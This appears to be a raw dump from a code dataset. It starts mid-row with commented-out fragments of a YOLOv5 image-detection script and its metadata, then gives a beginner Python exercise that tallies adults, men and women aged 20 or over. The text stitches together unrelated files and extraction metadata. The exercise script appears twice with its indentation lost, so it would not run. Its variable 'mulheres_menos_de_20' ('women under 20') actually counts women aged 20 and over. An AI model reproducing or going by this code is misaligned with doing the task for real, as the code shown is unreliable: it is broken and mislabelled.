            # center_co = (torch.tensor(xywh) * gn).detach().numpy().tolist()  # centre coordinates and width/height
            # label = '%s' % (self.names[int(cls)])
            # put_str = 'location:'
            # for rect in diag_co:  # draw box and label
# # rect = [int(i) for i in rect]
# # cv2.rectangle(self.im0, (rect[0],rect[1],rect[2],rect[3]), (0, 0, 255),6)
# cv2.rectangle(self.im0, (int(rect[0]),int(rect[1]),int(rect[2]),int(rect[3])), (0, 0, 255),6)
# # cv2.putText(self.im0, label, (rect[0],rect[1]), cv2.FONT_ITALIC, 4, (0, 255, 0), 6)
# cv2.putText(self.im0, label, (int(rect[0]),int(rect[1])), cv2.FONT_ITALIC, 4, (0, 255, 0), 6)
# put_str += str(rect)
# cv2.putText(self.im0, put_str, (10, 100), cv2.FONT_ITALIC, 3, (255, 0, 0), 6)
# self.diag_co = diag_co
# self.center_co = center_co
# self.label = label
# self.conf = conf
if __name__ == '__main__':
    # standalone smoke test; SimpleNamespace is only a stand-in for the ROS service response object
    from types import SimpleNamespace
    testM = detectImage('v5l-last.pt')
    frame = cv2.imread('2.png')
    res = testM.detect(frame, SimpleNamespace(isFind=0, detect_res=-1, conf=0.0))
| en | 0.223245 | # sys.path.append(rospy.get_param('/pkg_path/vision')) #选择gpu或cpu #模型路径 # 加载模型 # 获取类别 # 为不同类别分配颜色 #图片大小 #是否更新的标志 #图像预处理 # BGR to RGB, to 3x416x416 # 归一化 #加载数据集 #检测 #NMS # res_xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4))).view(-1).tolist() # res_xyxy = torch.tensor(xyxy).view(-1).tolist() # self.res_xywh.append(res_xywh) # self.res_xyxy.append(res_xyxy) # diag_co = torch.tensor(xyxy).view(1, 4).detach().numpy().tolist() #对角坐标 # xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh # center_co = (torch.tensor(xywh) * gn).detach().numpy().tolist() #中心坐标与长宽 # label = '%s' % (self.names[int(cls)]) # put_str = 'location:' # for rect in diag_co: #画框与文字 # # rect = [int(i) for i in rect] # # cv2.rectangle(self.im0, (rect[0],rect[1],rect[2],rect[3]), (0, 0, 255),6) # cv2.rectangle(self.im0, (int(rect[0]),int(rect[1]),int(rect[2]),int(rect[3])), (0, 0, 255),6) # # cv2.putText(self.im0, label, (rect[0],rect[1]), cv2.FONT_ITALIC, 4, (0, 255, 0), 6) # cv2.putText(self.im0, label, (int(rect[0]),int(rect[1])), cv2.FONT_ITALIC, 4, (0, 255, 0), 6) # put_str += str(rect) # cv2.putText(self.im0, put_str, (10, 100), cv2.FONT_ITALIC, 3, (255, 0, 0), 6) # self.diag_co = diag_co # self.center_co = center_co # self.label = label # self.conf = conf | 2.093388 | 2 |
desafios/desafio 069.py | juaoantonio/curso_video_python | 0 | 6616750 | <filename>desafios/desafio 069.py
# Variables
maiores_de_idade = 0
homens = 0
mulheres_menos_de_20 = 0
# Loop over the inputs
while True:
    # Program header
print('-' * 50)
print('CADASTRE UMA PESSOA'.center(50))
print('-' * 50)
    # Age and sex inputs and the conditions for each case
idade = int(input('Idade: '))
if idade >= 18:
maiores_de_idade += 1
sexo = str(input('Sexo [M/F]: ')).strip().upper()
if sexo[0] == 'M':
homens += 1
elif sexo[0] == 'F' and idade >= 20:
mulheres_menos_de_20 += 1
print('-' * 50)
    # Ask the user whether they want to continue
continuar = str(input('Quer continuar? [S/N] ')).strip().upper()
while continuar != 'S' and continuar != 'N':
print('Não entendi. Digite algo válido!')
continuar = str(input('Quer continuar? [S/N] ')).strip().upper()
if continuar == 'N':
break
# Final results
print()
print(f'''Resultados da análise:
Total de pessoas com mais de 18 anos: {maiores_de_idade}
Total de homens cadastrados: {homens}
Total de mulheres com mais de 20 anos: {mulheres_menos_de_20}''')
| <filename>desafios/desafio 069.py
# Variables
maiores_de_idade = 0
homens = 0
mulheres_menos_de_20 = 0
# Loop over the inputs
while True:
    # Program header
print('-' * 50)
print('CADASTRE UMA PESSOA'.center(50))
print('-' * 50)
    # Age and sex inputs and the conditions for each case
idade = int(input('Idade: '))
if idade >= 18:
maiores_de_idade += 1
sexo = str(input('Sexo [M/F]: ')).strip().upper()
if sexo[0] == 'M':
homens += 1
elif sexo[0] == 'F' and idade >= 20:
mulheres_menos_de_20 += 1
print('-' * 50)
    # Ask the user whether they want to continue
continuar = str(input('Quer continuar? [S/N] ')).strip().upper()
while continuar != 'S' and continuar != 'N':
print('Não entendi. Digite algo válido!')
continuar = str(input('Quer continuar? [S/N] ')).strip().upper()
if continuar == 'N':
break
# Final results
print()
print(f'''Resultados da análise:
Total de pessoas com mais de 18 anos: {maiores_de_idade}
Total de homens cadastrados: {homens}
Total de mulheres com mais de 20 anos: {mulheres_menos_de_20}''')
| pt | 0.969544 | # Variáveis # Repetição dos inputs # Cabeçalho do programa # Inputs de idade e sexo e as condições para cada caso # Pergunta para usuário se ele quer continuar no programa # Resultado final Resultados da análise: Total de pessoas com mais de 18 anos: {maiores_de_idade} Total de homens cadastrados: {homens} Total de mulheres com mais de 20 anos: {mulheres_menos_de_20} | 4.069018 | 4 |